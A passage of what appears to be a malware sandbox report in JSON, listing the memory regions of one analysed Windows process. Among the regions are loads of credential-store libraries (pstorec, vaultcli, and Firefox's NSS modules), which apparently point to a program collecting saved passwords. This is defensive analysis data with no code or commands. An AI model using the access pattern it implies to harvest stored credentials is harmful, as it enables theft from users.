1979908096, "type": "region", "version": 1 }, "end_va": 1980563455, "entry_point": 1979992549, "filename": "\\Windows\\System32\\advapi32.dll", "id": "region_1379", "name": "advapi32.dll", "norm_filename": "c:\\windows\\system32\\advapi32.dll", "region_type": "memory_mapped_file", "start_va": 1979908096, "timestamp": "00:01:18.748", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 356352, "start_va": 1980628992, "type": "region", "version": 1 }, "end_va": 1980985343, "entry_point": 1980734374, "filename": "\\Windows\\System32\\shlwapi.dll", "id": "region_1380", "name": "shlwapi.dll", "norm_filename": "c:\\windows\\system32\\shlwapi.dll", "region_type": "memory_mapped_file", "start_va": 1980628992, "timestamp": "00:01:18.749", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 102400, "start_va": 1983053824, "type": "region", "version": 1 }, "end_va": 1983156223, "entry_point": 1983072629, "filename": "\\Windows\\System32\\sechost.dll", "id": "region_1381", "name": "sechost.dll", "norm_filename": "c:\\windows\\system32\\sechost.dll", "region_type": "memory_mapped_file", "start_va": 1983053824, "timestamp": "00:01:18.750", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 12886016, "start_va": 1984888832, "type": "region", "version": 1 }, "end_va": 1997774847, "entry_point": 1985418753, "filename": "\\Windows\\System32\\shell32.dll", "id": "region_1382", "name": "shell32.dll", "norm_filename": "c:\\windows\\system32\\shell32.dll", "region_type": "memory_mapped_file", "start_va": 1984888832, "timestamp": "00:01:18.752", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 126976, "start_va": 1997799424, "type": "region", "version": 1 }, "end_va": 1997926399, "entry_point": 1997804373, "filename": "\\Windows\\System32\\imm32.dll", "id": "region_1383", "name": "imm32.dll", "norm_filename": "c:\\windows\\system32\\imm32.dll", "region_type": "memory_mapped_file", "start_va": 1997799424, "timestamp": "00:01:18.755", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 503808, "start_va": 1997930496, "type": "region", "version": 1 }, "end_va": 1998434303, "entry_point": 1997937390, "filename": "\\Windows\\System32\\comdlg32.dll", "id": "region_1384", "name": "comdlg32.dll", "norm_filename": "c:\\windows\\system32\\comdlg32.dll", "region_type": "memory_mapped_file", "start_va": 1997930496, "timestamp": "00:01:18.756", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1003520, "start_va": 1998454784, "type": "region", "version": 1 }, "end_va": 1999458303, "entry_point": 1998461029, "filename": "\\Windows\\System32\\wininet.dll", "id": "region_1385", "name": "wininet.dll", "norm_filename": "c:\\windows\\system32\\wininet.dll", "region_type": "memory_mapped_file", "start_va": 1998454784, "timestamp": "00:01:18.758", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 835584, "start_va": 1999503360, "type": "region", "version": 1 }, "end_va": 2000338943, "entry_point": 1999509131, "filename": "\\Windows\\System32\\msctf.dll", "id": "region_1386", "name": "msctf.dll", "norm_filename": "c:\\windows\\system32\\msctf.dll", "region_type": "memory_mapped_file", "start_va": 1999503360, "timestamp": "00:01:18.758", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 704512, "start_va": 2000355328, "type": "region", "version": 1 }, "end_va": 2001059839, "entry_point": 2000397426, "filename": "\\Windows\\System32\\msvcrt.dll", "id": "region_1387", "name": "msvcrt.dll", "norm_filename": "c:\\windows\\system32\\msvcrt.dll", "region_type": "memory_mapped_file", "start_va": 2000355328, "timestamp": "00:01:18.759", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1425408, "start_va": 2001076224, "type": "region", "version": 1 }, "end_va": 2002501631, "entry_point": 2001386045, "filename": "\\Windows\\System32\\ole32.dll", "id": "region_1388", "name": "ole32.dll", "norm_filename": "c:\\windows\\system32\\ole32.dll", "region_type": "memory_mapped_file", "start_va": 2001076224, "timestamp": "00:01:18.760", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 319488, "start_va": 2003894272, "type": "region", "version": 1 }, "end_va": 2004213759, "entry_point": 2003934217, "filename": "\\Windows\\System32\\gdi32.dll", "id": "region_1389", "name": "gdi32.dll", "norm_filename": "c:\\windows\\system32\\gdi32.dll", "region_type": "memory_mapped_file", "start_va": 2003894272, "timestamp": "00:01:18.760", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 585728, "start_va": 2004221952, "type": "region", "version": 1 }, "end_va": 2004807679, "entry_point": 2004238257, "filename": "\\Windows\\System32\\oleaut32.dll", "id": "region_1390", "name": "oleaut32.dll", "norm_filename": "c:\\windows\\system32\\oleaut32.dll", "region_type": "memory_mapped_file", "start_va": 2004221952, "timestamp": "00:01:18.761", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1048576, "start_va": 2137980928, "type": "region", "version": 1 }, "end_va": 2139029503, "entry_point": 0, "filename": null, "id": "region_1391", "name": "pagefile_0x000000007f6f0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2137980928, "timestamp": "00:01:18.761", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000009-region_00001392-addr_0x0000000000020000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_257", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 135167, "entry_point": 0, "filename": null, "id": "region_1392", "name": "private_0x0000000000020000", "norm_filename": null, "region_type": "private_memory", "start_va": 131072, "timestamp": "00:01:19.002", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000009-region_00001393-addr_0x0000000000140000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_258", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 1310720, "type": "region", "version": 1 }, "end_va": 1314815, "entry_point": 0, "filename": null, "id": "region_1393", "name": "private_0x0000000000140000", "norm_filename": null, "region_type": "private_memory", "start_va": 1310720, "timestamp": "00:01:19.002", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000009-region_00001394-addr_0x0000000000350000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_259", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 3473408, "type": "region", "version": 1 }, "end_va": 3538943, "entry_point": 0, "filename": null, "id": "region_1394", "name": "private_0x0000000000350000", "norm_filename": null, "region_type": "private_memory", "start_va": 3473408, "timestamp": "00:01:19.003", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1052672, "start_va": 5439488, "type": "region", "version": 1 }, "end_va": 6492159, "entry_point": 0, "filename": null, "id": "region_1395", "name": "pagefile_0x0000000000530000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 5439488, "timestamp": "00:01:19.003", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 12582912, "start_va": 6553600, "type": "region", "version": 1 }, "end_va": 19136511, "entry_point": 0, "filename": null, "id": "region_1396", "name": "pagefile_0x0000000000640000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 6553600, "timestamp": "00:01:19.003", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000009-region_00001415-addr_0x0000000001240000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_270", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 19136512, "type": "region", "version": 1 }, "end_va": 20185087, "entry_point": 0, "filename": null, "id": "region_1415", "name": "private_0x0000000001240000", "norm_filename": null, "region_type": "private_memory", "start_va": 19136512, "timestamp": "00:01:19.178", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 1376256, "type": "region", "version": 1 }, "end_va": 1380351, "entry_point": 0, "filename": null, "id": "region_1416", "name": "pagefile_0x0000000000150000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1376256, "timestamp": "00:01:19.211", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 2945024, "start_va": 20185088, "type": "region", "version": 1 }, "end_va": 23130111, "entry_point": 20185088, "filename": "\\Windows\\Globalization\\Sorting\\SortDefault.nls", "id": "region_1417", "name": "sortdefault.nls", "norm_filename": "c:\\windows\\globalization\\sorting\\sortdefault.nls", "region_type": "memory_mapped_file", "start_va": 20185088, "timestamp": "00:01:19.226", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 90112, "start_va": 1964900352, "type": "region", "version": 1 }, "end_va": 1964990463, "entry_point": 1964912067, "filename": "\\Windows\\System32\\cryptsp.dll", "id": "region_1459", "name": "cryptsp.dll", "norm_filename": "c:\\windows\\system32\\cryptsp.dll", "region_type": "memory_mapped_file", "start_va": 1964900352, "timestamp": "00:01:19.775", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 245760, "start_va": 3145728, "type": "region", "version": 1 }, "end_va": 3391487, "entry_point": 3150477, "filename": "\\Windows\\System32\\rsaenh.dll", "id": "region_1460", "name": "rsaenh.dll", "norm_filename": "c:\\windows\\system32\\rsaenh.dll", "region_type": "memory_mapped_file", "start_va": 3145728, "timestamp": "00:01:19.780", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 241664, "start_va": 1962409984, "type": "region", "version": 1 }, "end_va": 1962651647, "entry_point": 1962414733, "filename": "\\Windows\\System32\\rsaenh.dll", "id": "region_1465", "name": "rsaenh.dll", "norm_filename": "c:\\windows\\system32\\rsaenh.dll", "region_type": "memory_mapped_file", "start_va": 1962409984, "timestamp": "00:01:19.796", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 49152, "start_va": 1969618944, "type": "region", "version": 1 }, "end_va": 1969668095, "entry_point": 1969623265, "filename": "\\Windows\\System32\\cryptbase.dll", "id": "region_1466", "name": "cryptbase.dll", "norm_filename": "c:\\windows\\system32\\cryptbase.dll", "region_type": "memory_mapped_file", "start_va": 1969618944, "timestamp": "00:01:19.798", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000009-region_00001467-addr_0x0000000001610000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_280", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 23134208, "type": "region", "version": 1 }, "end_va": 24182783, "entry_point": 0, "filename": null, "id": "region_1467", "name": "private_0x0000000001610000", "norm_filename": null, "region_type": "private_memory", "start_va": 23134208, "timestamp": "00:01:19.880", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 53248, "start_va": 1921056768, "type": "region", "version": 1 }, "end_va": 1921110015, "entry_point": 1921080093, "filename": "\\Windows\\System32\\pstorec.dll", "id": "region_1468", "name": "pstorec.dll", "norm_filename": "c:\\windows\\system32\\pstorec.dll", "region_type": "memory_mapped_file", "start_va": 1921056768, "timestamp": "00:01:19.880", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000009-region_00001469-addr_0x000000007ffde000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_281", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147344384, "type": "region", "version": 1 }, "end_va": 2147348479, "entry_point": 0, "filename": null, "id": "region_1469", "name": "private_0x000000007ffde000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147344384, "timestamp": "00:01:19.881", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 81920, "start_va": 1948123136, "type": "region", "version": 1 }, "end_va": 1948205055, "entry_point": 1948130729, "filename": "\\Windows\\System32\\atl.dll", "id": "region_1470", "name": "atl.dll", "norm_filename": "c:\\windows\\system32\\atl.dll", "region_type": "memory_mapped_file", "start_va": 1948123136, "timestamp": "00:01:19.882", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 49152, "start_va": 1916403712, "type": "region", "version": 1 }, "end_va": 1916452863, "entry_point": 1916403712, "filename": "\\Windows\\System32\\vaultcli.dll", "id": "region_1471", "name": "vaultcli.dll", "norm_filename": "c:\\windows\\system32\\vaultcli.dll", "region_type": "memory_mapped_file", "start_va": 1916403712, "timestamp": "00:01:19.888", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000009-region_00001487-addr_0x0000000001710000-size_0x0000000000101000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_282", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1052672, "start_va": 24182784, "type": "region", "version": 1 }, "end_va": 25235455, "entry_point": 0, "filename": null, "id": "region_1487", "name": "private_0x0000000001710000", "norm_filename": null, "region_type": "private_memory", "start_va": 24182784, "timestamp": "00:01:21.079", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1777664, "start_va": 24182784, "type": "region", "version": 1 }, "end_va": 25960447, "entry_point": 24182784, "filename": "\\Program Files\\Mozilla Firefox\\nss3.dll", "id": "region_1491", "name": "nss3.dll", "norm_filename": "c:\\program files\\mozilla firefox\\nss3.dll", "region_type": "memory_mapped_file", "start_va": 24182784, "timestamp": "00:01:21.092", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1777664, "start_va": 24182784, "type": "region", "version": 1 }, "end_va": 25960447, "entry_point": 25634851, "filename": "\\Program Files\\Mozilla Firefox\\nss3.dll", "id": "region_1492", "name": "nss3.dll", "norm_filename": "c:\\program files\\mozilla firefox\\nss3.dll", "region_type": "memory_mapped_file", "start_va": 24182784, "timestamp": "00:01:21.190", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1789952, "start_va": 1595932672, "type": "region", "version": 1 }, "end_va": 1597722623, "entry_point": 1597384739, "filename": "\\Program Files\\Mozilla Firefox\\nss3.dll", "id": "region_1494", "name": "nss3.dll", "norm_filename": "c:\\program files\\mozilla firefox\\nss3.dll", "region_type": "memory_mapped_file", "start_va": 1595932672, "timestamp": "00:01:21.268", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 204800, "start_va": 1826226176, "type": "region", "version": 1 }, "end_va": 1826430975, "entry_point": 1826226176, "filename": "\\Windows\\System32\\winmm.dll", "id": "region_1496", "name": "winmm.dll", "norm_filename": "c:\\windows\\system32\\winmm.dll", "region_type": "memory_mapped_file", "start_va": 1826226176, "timestamp": "00:01:21.296", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 28672, "start_va": 1868955648, "type": "region", "version": 1 }, "end_va": 1868984319, "entry_point": 1868960032, "filename": "\\Windows\\System32\\wsock32.dll", "id": "region_1497", "name": "wsock32.dll", "norm_filename": "c:\\windows\\system32\\wsock32.dll", "region_type": "memory_mapped_file", "start_va": 1868955648, "timestamp": "00:01:21.408", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 217088, "start_va": 1974599680, "type": "region", "version": 1 }, "end_va": 1974816767, "entry_point": 1974604893, "filename": "\\Windows\\System32\\ws2_32.dll", "id": "region_1498", "name": "ws2_32.dll", "norm_filename": "c:\\windows\\system32\\ws2_32.dll", "region_type": "memory_mapped_file", "start_va": 1974599680, "timestamp": "00:01:21.409", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 24576, "start_va": 1977745408, "type": "region", "version": 1 }, "end_va": 1977769983, "entry_point": 1977751426, "filename": "\\Windows\\System32\\nsi.dll", "id": "region_1499", "name": "nsi.dll", "norm_filename": "c:\\windows\\system32\\nsi.dll", "region_type": "memory_mapped_file", "start_va": 1977745408, "timestamp": "00:01:21.410", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 778240, "start_va": 1604452352, "type": "region", "version": 1 }, "end_va": 1605230591, "entry_point": 1604452352, "filename": "\\Program Files\\Mozilla Firefox\\msvcr100.dll", "id": "region_1501", "name": "msvcr100.dll", "norm_filename": "c:\\program files\\mozilla firefox\\msvcr100.dll", "region_type": "memory_mapped_file", "start_va": 1604452352, "timestamp": "00:01:21.468", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 139264, "start_va": 1833369600, "type": "region", "version": 1 }, "end_va": 1833508863, "entry_point": 1833369600, "filename": "\\Program Files\\Mozilla Firefox\\mozglue.dll", "id": "region_1503", "name": "mozglue.dll", "norm_filename": "c:\\program files\\mozilla firefox\\mozglue.dll", "region_type": "memory_mapped_file", "start_va": 1833369600, "timestamp": "00:01:21.586", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 430080, "start_va": 1595473920, "type": "region", "version": 1 }, "end_va": 1595903999, "entry_point": 1595473920, "filename": "\\Program Files\\Mozilla Firefox\\msvcp100.dll", "id": "region_1505", "name": "msvcp100.dll", "norm_filename": "c:\\program files\\mozilla firefox\\msvcp100.dll", "region_type": "memory_mapped_file", "start_va": 1595473920, "timestamp": "00:01:21.636", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000009-region_00001510-addr_0x0000000001710000-size_0x00000000000d0000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_286", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 851968, "start_va": 24182784, "type": "region", "version": 1 }, "end_va": 25034751, "entry_point": 0, "filename": null, "id": "region_1510", "name": "private_0x0000000001710000", "norm_filename": null, "region_type": "private_memory", "start_va": 24182784, "timestamp": "00:01:21.790", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000009-region_00001511-addr_0x00000000017e0000-size_0x00000000000f0000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_287", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 983040, "start_va": 25034752, "type": "region", "version": 1 }, "end_va": 26017791, "entry_point": 0, "filename": null, "id": "region_1511", "name": "private_0x00000000017e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 25034752, "timestamp": "00:01:21.795", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000009-region_00001514-addr_0x00000000018d0000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_288", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 26017792, "type": "region", "version": 1 }, "end_va": 27066367, "entry_point": 0, "filename": null, "id": "region_1514", "name": "private_0x00000000018d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 26017792, "timestamp": "00:01:21.970", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000009-region_00001517-addr_0x00000000019d0000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_289", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 27066368, "type": "region", "version": 1 }, "end_va": 28114943, "entry_point": 0, "filename": null, "id": "region_1517", "name": "private_0x00000000019d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 27066368, "timestamp": "00:01:22.159", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000009-region_00001518-addr_0x0000000001a00000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_290", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 27262976, "type": "region", "version": 1 }, "end_va": 28311551, "entry_point": 0, "filename": null, "id": "region_1518", "name": "private_0x0000000001a00000", "norm_filename": null, "region_type": "private_memory", "start_va": 27262976, "timestamp": "00:01:22.160", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 159744, "start_va": 1797586944, "type": "region", "version": 1 }, "end_va": 1797746687, "entry_point": 1797586944, "filename": "\\Program Files\\Mozilla Firefox\\softokn3.dll", "id": "region_1521", "name": "softokn3.dll", "norm_filename": "c:\\program files\\mozilla firefox\\softokn3.dll", "region_type": "memory_mapped_file", "start_va": 1797586944, "timestamp": "00:01:22.479", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 94208, "start_va": 1802240000, "type": "region", "version": 1 }, "end_va": 1802334207, "entry_point": 1802240000, "filename": "\\Program Files\\Mozilla Firefox\\nssdbm3.dll", "id": "region_1522", "name": "nssdbm3.dll", "norm_filename": "c:\\program files\\mozilla firefox\\nssdbm3.dll", "region_type": "memory_mapped_file", "start_va": 1802240000, "timestamp": "00:01:22.619", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 1441792, "type": "region", "version": 1 }, "end_va": 1445887, "entry_point": 1441792, "filename": "\\Windows\\System32\\tzres.dll", "id": "region_1529", "name": "tzres.dll", "norm_filename": "c:\\windows\\system32\\tzres.dll", "region_type": "memory_mapped_file", "start_va": 1441792, "timestamp": "00:01:22.794", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 28672, "start_va": 1507328, "type": "region", "version": 1 }, "end_va": 1535999, "entry_point": 0, "filename": null, "id": "region_1530", "name": "pagefile_0x0000000000170000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1507328, "timestamp": "00:01:22.803", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 1572864, "type": "region", "version": 1 }, "end_va": 1581055, "entry_point": 0, "filename": null, "id": "region_1531", "name": "pagefile_0x0000000000180000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1572864, "timestamp": "00:01:22.803", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4141056, "start_va": 28311552, "type": "region", "version": 1 }, "end_va": 32452607, "entry_point": 0, "filename": null, "id": "region_1532", "name": "pagefile_0x0000000001b00000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 28311552, "timestamp": "00:01:22.803", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 323584, "start_va": 1595146240, "type": "region", "version": 1 }, "end_va": 1595469823, "entry_point": 1595146240, "filename": "\\Program Files\\Mozilla Firefox\\freebl3.dll", "id": "region_1534", "name": "freebl3.dll", "norm_filename": "c:\\program files\\mozilla firefox\\freebl3.dll", "region_type": "memory_mapped_file", "start_va": 1595146240, "timestamp": "00:01:22.899", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 159744, "start_va": 1797390336, "type": "region", "version": 1 }, "end_va": 1797550079, "entry_point": 1797506441, "filename": "\\Program Files\\Mozilla Firefox\\softokn3.dll", "id": "region_1549", "name": "softokn3.dll", "norm_filename": "c:\\program files\\mozilla firefox\\softokn3.dll", "region_type": "memory_mapped_file", "start_va": 1797390336, "timestamp": "00:01:23.412", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 94208, "start_va": 1797652480, "type": "region", "version": 1 }, "end_va": 1797746687, "entry_point": 1797724832, "filename": "\\Program Files\\Mozilla Firefox\\nssdbm3.dll", "id": "region_1550", "name": "nssdbm3.dll", "norm_filename": "c:\\program files\\mozilla firefox\\nssdbm3.dll", "region_type": "memory_mapped_file", "start_va": 1797652480, "timestamp": "00:01:23.415", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 323584, "start_va": 1594818560, "type": "region", "version": 1 }, "end_va": 1595142143, "entry_point": 1595040770, "filename": "\\Program Files\\Mozilla Firefox\\freebl3.dll", "id": "region_1551", "name": "freebl3.dll", "norm_filename": "c:\\program files\\mozilla firefox\\freebl3.dll", "region_type": "memory_mapped_file", "start_va": 1594818560, "timestamp": "00:01:23.443", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000009-region_00001552-addr_0x0000000000160000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_299", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 